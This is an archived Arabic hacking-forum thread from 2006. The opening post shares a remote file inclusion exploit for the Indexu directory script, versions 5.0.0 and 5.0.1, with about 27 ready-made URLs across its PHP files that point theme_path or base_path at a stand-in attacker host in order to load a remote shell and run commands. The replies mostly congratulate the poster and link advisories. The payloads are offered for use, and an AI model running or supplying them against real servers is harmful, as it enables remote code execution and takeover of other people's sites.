المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit

متكي ورا الشمس
07-04-2006, 08:28
ثغرة في سكربت دليل المواقع indexu
الاصدار: 5.0.0 5.0.1
اكتشاف: انا = me = SnIpEr_SA :d

انكلود ,, يعني تركيب شل من مصدر اخر وتطبيق الاوامر على السيرفر ,,،
وبإمكانكم استخدام اي من الروابط اللي تحت مع تغير مايلزم ,,



hello my frind

Application : Indexu
version : 5.0.0 5.0.1
URL : http://www.nicecoder.com/



Vulnerable:# INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit

Discovered By SnIpEr_SA

in (theme_path)
this file :
exploit:
http://example.com/indexu/index.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/become_editor.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/add.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/bad_link.php?theme_path=http://evil.txt

http://example.com/indexu/browse.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/detail.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/fav.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/get_rated.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/login.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/mailing_list.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/new.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/modify.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/pick.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/power_search.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/rating.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/rating.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/register.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/review.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/rss.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/search.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/send_pwd.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/sendmail.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/tell_friend.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/top_rated.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/user_detail.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/user_search.php?theme_path=http://evil.txt?cmd?cmd

---------------------------

in (base_path)

in this file:

invoice.php

expliot:

http://example.com/indexu/invoice.php?base_path=http://evil.txt?cmd?cmd

-------------------

greetz:All my frineds

www.3asfh.com

www.lezr.com

<<<<

sEe u Soon my frind....
BadNet
07-04-2006, 08:46
كبيييييييرررررر

مبروووك على اكتشافك
انشاء الله اكتر واكتر

تحياتي لك
dr-drawzy
08-04-2006, 04:16
هاي تغرة حطيتها بالمنتدى من قبل المرجو الإشارة عند الإقتباس ...........
AvIrL@BoY@LoVeR
08-04-2006, 04:27
هاي تغرة حطيتها بالمنتدى من قبل المرجو الإشارة عند الإقتباس ...........

انت يابو

وين رايح

الثغرهـ مكتشفها متكي

لايكون انت الي مكتشفها وسرقها منك

ههههههههااي

من جد ماخذ بنفسك مقلب :)

تشااو
SaUdi-VirUs
09-04-2006, 08:44
كقو كقو والله متكي ثغره حلوه وترزقة منها :D

يعطيك العافيه ,,
dr-drawzy
10-04-2006, 02:17
تكلم باحترام يالطيب ..

<< مسحب كان هنا ؟؟
MeSa7eB
10-04-2006, 02:52
بطل والله ..

تقدير واحترام
متكي ورا الشمس
13-04-2006, 07:50
الله يخليكم اخواني ,,

وهذا التسجيل بالسكيورتي فوكس ,,

http://www.securityfocus.com/archive/1/430599/30/0/threaded

http://www.securityfocus.com/bid/17470

-------------------
تحياتي
الملك18
13-04-2006, 08:08
يعطيك العافيه على الثغرة

ومبروك الاكتشاف :d
a_alsayad
27-07-2006, 01:00
الف شكر اخواني
فعلا العاصفة هو الابداع
AG-Spider
27-07-2006, 01:08
مبروك متكي استمر يا بطل
المــــــــــلك
27-07-2006, 03:39
مبـــــــــــــــروك امتكي مافي شي غريب عليك ابداع في ابداع
nemo3000
27-07-2006, 05:17
انت رائع والله أخى متكى
ولكن هل هذة الثغرة غير دول :
http://milw0rm.com/exploits/related/INDEXU